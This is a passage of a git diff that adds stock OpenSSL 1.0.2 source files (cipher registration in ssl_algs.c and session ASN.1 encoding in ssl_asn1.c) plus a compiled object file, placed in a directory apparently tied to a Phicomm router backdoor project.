+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include <openssl/lhash.h>
+#include "ssl_locl.h"
+
+int SSL_library_init(void)
+{
+
+#ifndef OPENSSL_NO_DES
+    EVP_add_cipher(EVP_des_cbc());
+    EVP_add_cipher(EVP_des_ede3_cbc());
+#endif
+#ifndef OPENSSL_NO_IDEA
+    EVP_add_cipher(EVP_idea_cbc());
+#endif
+#ifndef OPENSSL_NO_RC4
+    EVP_add_cipher(EVP_rc4());
+# if !defined(OPENSSL_NO_MD5) && (defined(__x86_64) || defined(__x86_64__))
+    EVP_add_cipher(EVP_rc4_hmac_md5());
+# endif
+#endif
+#ifndef OPENSSL_NO_RC2
+    EVP_add_cipher(EVP_rc2_cbc());
+    /*
+     * Not actually used for SSL/TLS but this makes PKCS#12 work if an
+     * application only calls SSL_library_init().
+     */
+    EVP_add_cipher(EVP_rc2_40_cbc());
+#endif
+#ifndef OPENSSL_NO_AES
+    EVP_add_cipher(EVP_aes_128_cbc());
+    EVP_add_cipher(EVP_aes_192_cbc());
+    EVP_add_cipher(EVP_aes_256_cbc());
+    EVP_add_cipher(EVP_aes_128_gcm());
+    EVP_add_cipher(EVP_aes_256_gcm());
+# if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+    EVP_add_cipher(EVP_aes_128_cbc_hmac_sha1());
+    EVP_add_cipher(EVP_aes_256_cbc_hmac_sha1());
+# endif
+# if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA256)
+    EVP_add_cipher(EVP_aes_128_cbc_hmac_sha256());
+    EVP_add_cipher(EVP_aes_256_cbc_hmac_sha256());
+# endif
+
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+    EVP_add_cipher(EVP_camellia_128_cbc());
+    EVP_add_cipher(EVP_camellia_256_cbc());
+#endif
+
+#ifndef OPENSSL_NO_SEED
+    EVP_add_cipher(EVP_seed_cbc());
+#endif
+
+#ifndef OPENSSL_NO_MD5
+    EVP_add_digest(EVP_md5());
+    EVP_add_digest_alias(SN_md5, "ssl2-md5");
+    EVP_add_digest_alias(SN_md5, "ssl3-md5");
+#endif
+#ifndef OPENSSL_NO_SHA
+    EVP_add_digest(EVP_sha1()); /* RSA with sha1 */
+    EVP_add_digest_alias(SN_sha1, "ssl3-sha1");
+    EVP_add_digest_alias(SN_sha1WithRSAEncryption, SN_sha1WithRSA);
+#endif
+#ifndef OPENSSL_NO_SHA256
+    EVP_add_digest(EVP_sha224());
+    EVP_add_digest(EVP_sha256());
+#endif
+#ifndef OPENSSL_NO_SHA512
+    EVP_add_digest(EVP_sha384());
+    EVP_add_digest(EVP_sha512());
+#endif
+#if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_DSA)
+    EVP_add_digest(EVP_dss1()); /* DSA with sha1 */
+    EVP_add_digest_alias(SN_dsaWithSHA1, SN_dsaWithSHA1_2);
+    EVP_add_digest_alias(SN_dsaWithSHA1, "DSS1");
+    EVP_add_digest_alias(SN_dsaWithSHA1, "dss1");
+#endif
+#ifndef OPENSSL_NO_ECDSA
+    EVP_add_digest(EVP_ecdsa());
+#endif
+    /* If you want support for phased out ciphers, add the following */
+#if 0
+    EVP_add_digest(EVP_sha());
+    EVP_add_digest(EVP_dss());
+#endif
+#ifndef OPENSSL_NO_COMP
+    /*
+     * This will initialise the built-in compression algorithms. The value
+     * returned is a STACK_OF(SSL_COMP), but that can be discarded safely
+     */
+    (void)SSL_COMP_get_compression_methods();
+#endif
+    /* initialize cipher/digest methods table */
+    ssl_load_ciphers();
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_algs.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_algs.o
new file mode 100644
index 0000000000000000000000000000000000000000..98fd3ce9fcf981ef3d52919486665d1dee03909b
GIT binary patch
literal 5392
zcmd^@TWB0r7{|}Ljjgt(v0kcH>uSBU>P~kzNt+ZcN!m0~(xx=2pa|n+cTCpqCUs|H
zTLmj9Ucf?qkRo^iAAAr*eNsV6@h(2~!M=zh`cf%~Qjnrz{r)ra?f!SN2daJagE{k^
z-}#^KTxQOkvwLuOY}*B?lu=8W&8C@CYRutFoBlxP4wz1Ji8;M|^&dM=0*pTYMR@=J
zWJV8Nfq@@QJt?C<bQk<+@D|=OGv`&gCDJ)&{%wOcec0Rwct`I4Wc$`$69kn)wpt3E
z?$DVS9n1rFXM-6pZ+1-#W<#V-wqUj@QztuDDG8m(n^F+ujTzapWm9JD?y33N`h2F}
z>2`A2{Kok(n}4E^b8<cFB8*uVTO?PPTpe<a?AUECFy<IoS}xe-(aoeD+htPwyHcx`
zEnae1263%$T(G|}sNv48^qExWl91RFNEeyk&bCve+pZw=MSIg)D;@T}l_8f7N7Ifk
zUI;^d`(CHbMGN%HLW0?9wP=}lEa=gdp{zqze5<XBc~ssk%fvh?Z}OXC9^IS#wwOCj
z6ng7p-k;z-F&|3sNY`P;6MS>5pG<IM)8@hjbgPgR^c=%?L)dP)@SY`YkAQZ3pM^hT
z;YTd|bqjyj!auU`uPyvr3qNJye_HrbSs3l+VU>mVTKKqy@3HV_E&LS=f6u~?TKMM{
z{*8tIXyK<U{C5ja$%m}nd@i%_l@^|{aD1m-uQDAtMdOTZ$sx%jDIn=a(u1TI$p$1F
zk@O+yN0QH(iHR|{Ql6@LwF7Q>wp=&v$k_PM;FvqUZQI1~q&qn{G&by-;d^(wB|mVB
zQ^nBtN+q{g-aF&h8byA|?{1XWialY0+})X~S9Gz-AV{rPAW^~X$u+W`#LpM{TJ!x)
zIm!#Y8(PanKV7UweTvIDAIFRO5bkK`1Vw67lB^?bw#1h?Xw=fOqF41Rm9p0|fCl7V
z2fi;;7f++k3Z}DEp7w*f86UdG-7&a**cBEw+vv48g+er~aN}Ny+uhfoz4<~|Dcp$h
zdQ|2-eNure`_S}@i9L3uTz{R7tTQSO_m8WHUq<|D;<`T|4(l_dzlQW{iL*XS95J;&
zy~J6+i8%Iu)ejM8{Rr{vNU!@$vj4izfUhR~0~Ckjd&I9NeVI7xXNhM>|0r?RKTiAx
z(mzF<_0JK%k@Sa&v;HOGYe@epan`><{3g=BMV$5T5Xad;pV#}uS&#h>hWWomF4cbu
zC<e~@uR<E}Tg6xXapJ5$K^*U->c1z>`k#oeBR%$4Sh7FAMmXd+8)^JA#BV3A2T}RV
zho?Q&V?Tz0Uo4mMu9&0UJBY6&Jx-0PUqgH;@wJvXS>jlm8VCD54DE9N@1*!Ro2q`4
zIL@BRw^JPM|0L=0EmHl1#FrEIEpZ+ujx(vosS)S??<2mR^aqKv{%PVl(!W5Q^)C{a
zpGS@UyiA<+uMsbh{!QYne>>)QPjKGQ@qS1gzYUb*oCHh0KcA7F;~XcxLh5Op6P7sN
zk)GrHOdNZP#`(n(=QQzd(r3hnVZ68+<^%_-b#KZzLA@5;XVk0t70;>r`|HLjd3Db?
zQ$b*y+8i>F=N&mY73Zo|e^w;3b9LX5pQ72I?iKgM`RUntXK!t8uV1Slkg5pi&$tiO
zWb1GA;JloS)W(o?f7W0Fv7^6Zl*iMfS%bY3&vc+cBBu`@53yr$;HBcDuKwc0w+@DH
zEqL;m?&g+BhBC5b`&i3}`Csc}Z6GGzc{XkTK8E6J`+6UU8P+7*k+}a@Gi+K<?{`a~
z`mFo-9LJCT;n#gq{$&g@98`Rrf5nf8gZ7j4PsX56h4DREzaqTd^FM<{D5lRD&ma4P
z)>q!HZPd%e5A+8F7sEFm|DGl5BWCj13u*}SiGd~O8sDgP^}A3Yrstq2xA0m01Ig13
A$p8QV

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_asn1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_asn1.c
new file mode 100644
index 0000000..f8c265c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_asn1.c
@@ -0,0 +1,631 @@
+/* ssl/ssl_asn1.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include "ssl_locl.h"
+#include <openssl/asn1_mac.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+typedef struct ssl_session_asn1_st {
+    ASN1_INTEGER version;
+    ASN1_INTEGER ssl_version;
+    ASN1_OCTET_STRING cipher;
+    ASN1_OCTET_STRING comp_id;
+    ASN1_OCTET_STRING master_key;
+    ASN1_OCTET_STRING session_id;
+    ASN1_OCTET_STRING session_id_context;
+    ASN1_OCTET_STRING key_arg;
+#ifndef OPENSSL_NO_KRB5
+    ASN1_OCTET_STRING krb5_princ;
+#endif                          /* OPENSSL_NO_KRB5 */
+    ASN1_INTEGER time;
+    ASN1_INTEGER timeout;
+    ASN1_INTEGER verify_result;
+#ifndef OPENSSL_NO_TLSEXT
+    ASN1_OCTET_STRING tlsext_hostname;
+    ASN1_INTEGER tlsext_tick_lifetime;
+    ASN1_OCTET_STRING tlsext_tick;
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_PSK
+    ASN1_OCTET_STRING psk_identity_hint;
+    ASN1_OCTET_STRING psk_identity;
+#endif                          /* OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_SRP
+    ASN1_OCTET_STRING srp_username;
+#endif                          /* OPENSSL_NO_SRP */
+} SSL_SESSION_ASN1;
+
+int i2d_SSL_SESSION(SSL_SESSION *in, unsigned char **pp)
+{
+#define LSIZE2 (sizeof(long)*2)
+    int v1 = 0, v2 = 0, v3 = 0, v4 = 0, v5 = 0, v7 = 0, v8 = 0;
+    unsigned char buf[4], ibuf1[LSIZE2], ibuf2[LSIZE2];
+    unsigned char ibuf3[LSIZE2], ibuf4[LSIZE2], ibuf5[LSIZE2];
+#ifndef OPENSSL_NO_TLSEXT
+    int v6 = 0, v9 = 0, v10 = 0;
+    unsigned char ibuf6[LSIZE2];
+#endif
+#ifndef OPENSSL_NO_COMP
+    unsigned char cbuf;
+    int v11 = 0;
+#endif
+#ifndef OPENSSL_NO_SRP
+    int v12 = 0;
+#endif
+    long l;
+    SSL_SESSION_ASN1 a;
+    M_ASN1_I2D_vars(in);
+
+    if ((in == NULL) || ((in->cipher == NULL) && (in->cipher_id == 0)))
+        return (0);
+
+    /*
+     * Note that I cheat in the following 2 assignments.  I know that if the
+     * ASN1_INTEGER passed to ASN1_INTEGER_set is > sizeof(long)+1, the
+     * buffer will not be re-OPENSSL_malloc()ed. This is a bit evil but makes
+     * things simple, no dynamic allocation to clean up :-)
+     */
+    a.version.length = LSIZE2;
+    a.version.type = V_ASN1_INTEGER;
+    a.version.data = ibuf1;
+    ASN1_INTEGER_set(&(a.version), SSL_SESSION_ASN1_VERSION);
+
+    a.ssl_version.length = LSIZE2;
+    a.ssl_version.type = V_ASN1_INTEGER;
+    a.ssl_version.data = ibuf2;
+    ASN1_INTEGER_set(&(a.ssl_version), in->ssl_version);
+
+    a.cipher.type = V_ASN1_OCTET_STRING;
+    a.cipher.data = buf;
+
+    if (in->cipher == NULL)
+        l = in->cipher_id;
+    else
+        l = in->cipher->id;
+    if (in->ssl_version == SSL2_VERSION) {
+        a.cipher.length = 3;
+        buf[0] = ((unsigned char)(l >> 16L)) & 0xff;
+        buf[1] = ((unsigned char)(l >> 8L)) & 0xff;
+        buf[2] = ((unsigned char)(l)) & 0xff;
+    } else {
+        a.cipher.length = 2;
+        buf[0] = ((unsigned char)(l >> 8L)) & 0xff;
+        buf[1] = ((unsigned char)(l)) & 0xff;
+    }
+
+#ifndef OPENSSL_NO_COMP
+    if (in->compress_meth) {
+        cbuf = (unsigned char)in->compress_meth;
+        a.comp_id.length = 1;
+        a.comp_id.type = V_ASN1_OCTET_STRING;
+        a.comp_id.data = &cbuf;
+    }
+#endif
+
+    a.master_key.length = in->master_key_length;
+    a.master_key.type = V_ASN1_OCTET_STRING;
+    a.master_key.data = in->master_key;
+
+    a.session_id.length = in->session_id_length;
+    a.session_id.type = V_ASN1_OCTET_STRING;
+    a.session_id.data = in->session_id;
+
+    a.session_id_context.length = in->sid_ctx_length;
+    a.session_id_context.type = V_ASN1_OCTET_STRING;
+    a.session_id_context.data = in->sid_ctx;
+
+    a.key_arg.length = in->key_arg_length;
+    a.key_arg.type = V_ASN1_OCTET_STRING;
+    a.key_arg.data = in->key_arg;
+
+#ifndef OPENSSL_NO_KRB5
+    if (in->krb5_client_princ_len) {
+        a.krb5_princ.length = in->krb5_client_princ_len;
+        a.krb5_princ.type = V_ASN1_OCTET_STRING;
+        a.krb5_princ.data = in->krb5_client_princ;
+    }
+#endif                          /* OPENSSL_NO_KRB5 */
+
+    if (in->time != 0L) {
+        a.time.length = LSIZE2;
+        a.time.type = V_ASN1_INTEGER;
+        a.time.data = ibuf3;
+        ASN1_INTEGER_set(&(a.time), in->time);
+    }
+
+    if (in->timeout != 0L) {
+        a.timeout.length = LSIZE2;
+        a.timeout.type = V_ASN1_INTEGER;
+        a.timeout.data = ibuf4;
+        ASN1_INTEGER_set(&(a.timeout), in->timeout);
+    }
+
+    if (in->verify_result != X509_V_OK) {
+        a.verify_result.length = LSIZE2;
+        a.verify_result.type = V_ASN1_INTEGER;
+        a.verify_result.data = ibuf5;
+        ASN1_INTEGER_set(&a.verify_result, in->verify_result);
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    if (in->tlsext_hostname) {
+        a.tlsext_hostname.length = strlen(in->tlsext_hostname);
+        a.tlsext_hostname.type = V_ASN1_OCTET_STRING;
+        a.tlsext_hostname.data = (unsigned char *)in->tlsext_hostname;
+    }
+    if (in->tlsext_tick) {
+        a.tlsext_tick.length = in->tlsext_ticklen;
+        a.tlsext_tick.type = V_ASN1_OCTET_STRING;
+        a.tlsext_tick.data = (unsigned char *)in->tlsext_tick;
+    }
+    if (in->tlsext_tick_lifetime_hint > 0) {
+        a.tlsext_tick_lifetime.length = LSIZE2;
+        a.tlsext_tick_lifetime.type = V_ASN1_INTEGER;
+        a.tlsext_tick_lifetime.data = ibuf6;
+        ASN1_INTEGER_set(&a.tlsext_tick_lifetime,
+                         in->tlsext_tick_lifetime_hint);
+    }
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_PSK
+    if (in->psk_identity_hint) {
+        a.psk_identity_hint.length = strlen(in->psk_identity_hint);
+        a.psk_identity_hint.type = V_ASN1_OCTET_STRING;
+        a.psk_identity_hint.data = (unsigned char *)(in->psk_identity_hint);
+    }
+    if (in->psk_identity) {
+        a.psk_identity.length = strlen(in->psk_identity);
+        a.psk_identity.type = V_ASN1_OCTET_STRING;
+        a.psk_identity.data = (unsigned char *)(in->psk_identity);
+    }
+#endif                          /* OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_SRP
+    if (in->srp_username) {
+        a.srp_username.length = strlen(in->srp_username);
+        a.srp_username.type = V_ASN1_OCTET_STRING;
+        a.srp_username.data = (unsigned char *)(in->srp_username);
+    }
+#endif                          /* OPENSSL_NO_SRP */
+
+    M_ASN1_I2D_len(&(a.version), i2d_ASN1_INTEGER);
+    M_ASN1_I2D_len(&(a.ssl_version), i2d_ASN1_INTEGER);
+    M_ASN1_I2D_len(&(a.cipher), i2d_ASN1_OCTET_STRING);
+    M_ASN1_I2D_len(&(a.session_id), i2d_ASN1_OCTET_STRING);
+    M_ASN1_I2D_len(&(a.master_key), i2d_ASN1_OCTET_STRING);
+#ifndef OPENSSL_NO_KRB5
+    if (in->krb5_client_princ_len)
+        M_ASN1_I2D_len(&(a.krb5_princ), i2d_ASN1_OCTET_STRING);
+#endif                          /* OPENSSL_NO_KRB5 */
+    if (in->key_arg_length > 0)
+        M_ASN1_I2D_len_IMP_opt(&(a.key_arg), i2d_ASN1_OCTET_STRING);
+    if (in->time != 0L)
+        M_ASN1_I2D_len_EXP_opt(&(a.time), i2d_ASN1_INTEGER, 1, v1);
+    if (in->timeout != 0L)
+        M_ASN1_I2D_len_EXP_opt(&(a.timeout), i2d_ASN1_INTEGER, 2, v2);
+    if (in->peer != NULL)
+        M_ASN1_I2D_len_EXP_opt(in->peer, i2d_X509, 3, v3);
+    M_ASN1_I2D_len_EXP_opt(&a.session_id_context, i2d_ASN1_OCTET_STRING, 4,
+                           v4);
+    if (in->verify_result != X509_V_OK)
+        M_ASN1_I2D_len_EXP_opt(&(a.verify_result), i2d_ASN1_INTEGER, 5, v5);
+
+#ifndef OPENSSL_NO_TLSEXT
+    if (in->tlsext_tick_lifetime_hint > 0)
+        M_ASN1_I2D_len_EXP_opt(&a.tlsext_tick_lifetime, i2d_ASN1_INTEGER, 9,
+                               v9);
+    if (in->tlsext_tick)
+        M_ASN1_I2D_len_EXP_opt(&(a.tlsext_tick), i2d_ASN1_OCTET_STRING, 10,
+                               v10);
+    if (in->tlsext_hostname)
+        M_ASN1_I2D_len_EXP_opt(&(a.tlsext_hostname), i2d_ASN1_OCTET_STRING, 6,
+                               v6);
+# ifndef OPENSSL_NO_COMP
+    if (in->compress_meth)
+        M_ASN1_I2D_len_EXP_opt(&(a.comp_id), i2d_ASN1_OCTET_STRING, 11, v11);
+# endif
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_PSK
+    if (in->psk_identity_hint)
+        M_ASN1_I2D_len_EXP_opt(&(a.psk_identity_hint), i2d_ASN1_OCTET_STRING,
+                               7, v7);
+    if (in->psk_identity)
+        M_ASN1_I2D_len_EXP_opt(&(a.psk_identity), i2d_ASN1_OCTET_STRING, 8,
+                               v8);
+#endif                          /* OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_SRP
+    if (in->srp_username)
+        M_ASN1_I2D_len_EXP_opt(&(a.srp_username), i2d_ASN1_OCTET_STRING, 12,
+                               v12);
+#endif                          /* OPENSSL_NO_SRP */
+
+    M_ASN1_I2D_seq_total();
+
+    M_ASN1_I2D_put(&(a.version), i2d_ASN1_INTEGER);
+    M_ASN1_I2D_put(&(a.ssl_version), i2d_ASN1_INTEGER);
+    M_ASN1_I2D_put(&(a.cipher), i2d_ASN1_OCTET_STRING);
+    M_ASN1_I2D_put(&(a.session_id), i2d_ASN1_OCTET_STRING);
+    M_ASN1_I2D_put(&(a.master_key), i2d_ASN1_OCTET_STRING);
+#ifndef OPENSSL_NO_KRB5
+    if (in->krb5_client_princ_len)
+        M_ASN1_I2D_put(&(a.krb5_princ), i2d_ASN1_OCTET_STRING);
+#endif                          /* OPENSSL_NO_KRB5 */
+    if (in->key_arg_length > 0)
+        M_ASN1_I2D_put_IMP_opt(&(a.key_arg), i2d_ASN1_OCTET_STRING, 0);
+    if (in->time != 0L)
+        M_ASN1_I2D_put_EXP_opt(&(a.time), i2d_ASN1_INTEGER, 1, v1);
+    if (in->timeout != 0L)
+        M_ASN1_I2D_put_EXP_opt(&(a.timeout), i2d_ASN1_INTEGER, 2, v2);
+    if (in->peer != NULL)
+        M_ASN1_I2D_put_EXP_opt(in->peer, i2d_X509, 3, v3);
+    M_ASN1_I2D_put_EXP_opt(&a.session_id_context, i2d_ASN1_OCTET_STRING, 4,
+                           v4);
+    if (in->verify_result != X509_V_OK)
+        M_ASN1_I2D_put_EXP_opt(&a.verify_result, i2d_ASN1_INTEGER, 5, v5);
+#ifndef OPENSSL_NO_TLSEXT
+    if (in->tlsext_hostname)
+        M_ASN1_I2D_put_EXP_opt(&(a.tlsext_hostname), i2d_ASN1_OCTET_STRING, 6,
+                               v6);
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_PSK
+    if (in->psk_identity_hint)
+        M_ASN1_I2D_put_EXP_opt(&(a.psk_identity_hint), i2d_ASN1_OCTET_STRING,
+                               7, v7);
+    if (in->psk_identity)
+        M_ASN1_I2D_put_EXP_opt(&(a.psk_identity), i2d_ASN1_OCTET_STRING, 8,
+                               v8);
+#endif                          /* OPENSSL_NO_PSK */
+#ifndef OPENSSL_NO_TLSEXT
+    if (in->tlsext_tick_lifetime_hint > 0)
+        M_ASN1_I2D_put_EXP_opt(&a.tlsext_tick_lifetime, i2d_ASN1_INTEGER, 9,
+                               v9);
+    if (in->tlsext_tick)
+        M_ASN1_I2D_put_EXP_opt(&(a.tlsext_tick), i2d_ASN1_OCTET_STRING, 10,
+                               v10);
+#endif                          /* OPENSSL_NO_TLSEXT */
+#ifndef OPENSSL_NO_COMP
+    if (in->compress_meth)
+        M_ASN1_I2D_put_EXP_opt(&(a.comp_id), i2d_ASN1_OCTET_STRING, 11, v11);
+#endif
+#ifndef OPENSSL_NO_SRP
+    if (in->srp_username)
+        M_ASN1_I2D_put_EXP_opt(&(a.srp_username), i2d_ASN1_OCTET_STRING, 12,
+                               v12);
+#endif                          /* OPENSSL_NO_SRP */
+    M_ASN1_I2D_finish();
+}
+
+SSL_SESSION *d2i_SSL_SESSION(SSL_SESSION **a, const unsigned char **pp,
+                             long length)
+{
+    int ssl_version = 0, i;
+    long id;
+    ASN1_INTEGER ai, *aip;
+    ASN1_OCTET_STRING os, *osp;
+    M_ASN1_D2I_vars(a, SSL_SESSION *, SSL_SESSION_new);
+
+    aip = &ai;
+    osp = &os;
+
+    M_ASN1_D2I_Init();
+    M_ASN1_D2I_start_sequence();
+
+    ai.data = NULL;
+    ai.length = 0;
+    M_ASN1_D2I_get_x(ASN1_INTEGER, aip, d2i_ASN1_INTEGER);
+    if (ai.data != NULL) {
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    }
+
+    /* we don't care about the version right now :-) */
+    M_ASN1_D2I_get_x(ASN1_INTEGER, aip, d2i_ASN1_INTEGER);
+    ssl_version = (int)ASN1_INTEGER_get(aip);
+    ret->ssl_version = ssl_version;
+    if (ai.data != NULL) {
+        OPENSSL_free(ai.data);
+        ai.data = NULL;
+        ai.length = 0;
+    }
+
+    os.data = NULL;
+    os.length = 0;
+    M_ASN1_D2I_get_x(ASN1_OCTET_STRING, osp, d2i_ASN1_OCTET_STRING);
+    if (ssl_version == SSL2_VERSION) {
+        if (os.length != 3) {
+            c.error = SSL_R_CIPHER_CODE_WRONG_LENGTH;
+            c.line = __LINE__;
+            goto err;
+        }
+        id = 0x02000000L |
+            ((unsigned long)os.data[0] << 16L) |
+            ((unsigned long)os.data[1] << 8L) | (unsigned long)os.data[2];
+    } else if ((ssl_version >> 8) >= SSL3_VERSION_MAJOR) {
+        if (os.length != 2) {
+            c.error = SSL_R_CIPHER_CODE_WRONG_LENGTH;
+            c.line = __LINE__;
+            goto err;
+        }
+        id = 0x03000000L |
+            ((unsigned long)os.data[0] << 8L) | (unsigned long)os.data[1];
+    } else {
+        c.error = SSL_R_UNKNOWN_SSL_VERSION;
+        c.line = __LINE__;
+        goto err;
+    }
+
+    ret->cipher = NULL;
+    ret->cipher_id = id;
+
+    M_ASN1_D2I_get_x(ASN1_OCTET_STRING, osp, d2i_ASN1_OCTET_STRING);
+    if ((ssl_version >> 8) >= SSL3_VERSION_MAJOR)
+        i = SSL3_MAX_SSL_SESSION_ID_LENGTH;
+    else                        /* if (ssl_version>>8 == SSL2_VERSION_MAJOR) */
+        i = SSL2_MAX_SSL_SESSION_ID_LENGTH;
+
+    if (os.length > i)
+        os.length = i;
+    if (os.length > (int)sizeof(ret->session_id)) /* can't happen */
+        os.length = sizeof(ret->session_id);
+
+    ret->session_id_length = os.length;
+    OPENSSL_assert(os.length <= (int)sizeof(ret->session_id));
+    memcpy(ret->session_id, os.data, os.length);
+
+    M_ASN1_D2I_get_x(ASN1_OCTET_STRING, osp, d2i_ASN1_OCTET_STRING);
+    if (os.length > SSL_MAX_MASTER_KEY_LENGTH)
+        ret->master_key_length = SSL_MAX_MASTER_KEY_LENGTH;
+    else
+        ret->master_key_length = os.length;
+    memcpy(ret->master_key, os.data, ret->master_key_length);
+
+    os.length = 0;
+
+#ifndef OPENSSL_NO_KRB5
+    os.length = 0;
+    M_ASN1_D2I_get_opt(osp, d2i_ASN1_OCTET_STRING, V_ASN1_OCTET_STRING);
+    if (os.data) {
+        if (os.length > SSL_MAX_KRB5_PRINCIPAL_LENGTH)
+            ret->krb5_client_princ_len = 0;
+        else
+            ret->krb5_client_princ_len = os.length;
+        memcpy(ret->krb5_client_princ, os.data, ret->krb5_client_princ_len);
+        OPENSSL_free(os.data);
+        os.data = NULL;
+        os.length = 0;
+    } else
+        ret->krb5_client_princ_len = 0;
+#endif                          /* OPENSSL_NO_KRB5 */
+
+    M_ASN1_D2I_get_IMP_opt(osp, d2i_ASN1_OCTET_STRING, 0,
+                           V_ASN1_OCTET_STRING);
+    if (os.length > SSL_MAX_KEY_ARG_LENGTH)
+        ret->key_arg_length = SSL_MAX_KEY_ARG_LENGTH;
+    else
+        ret->key_arg_length = os.length;
+    memcpy(ret->key_arg, os.data, ret->key_arg_length);
+    if (os.data != NULL)
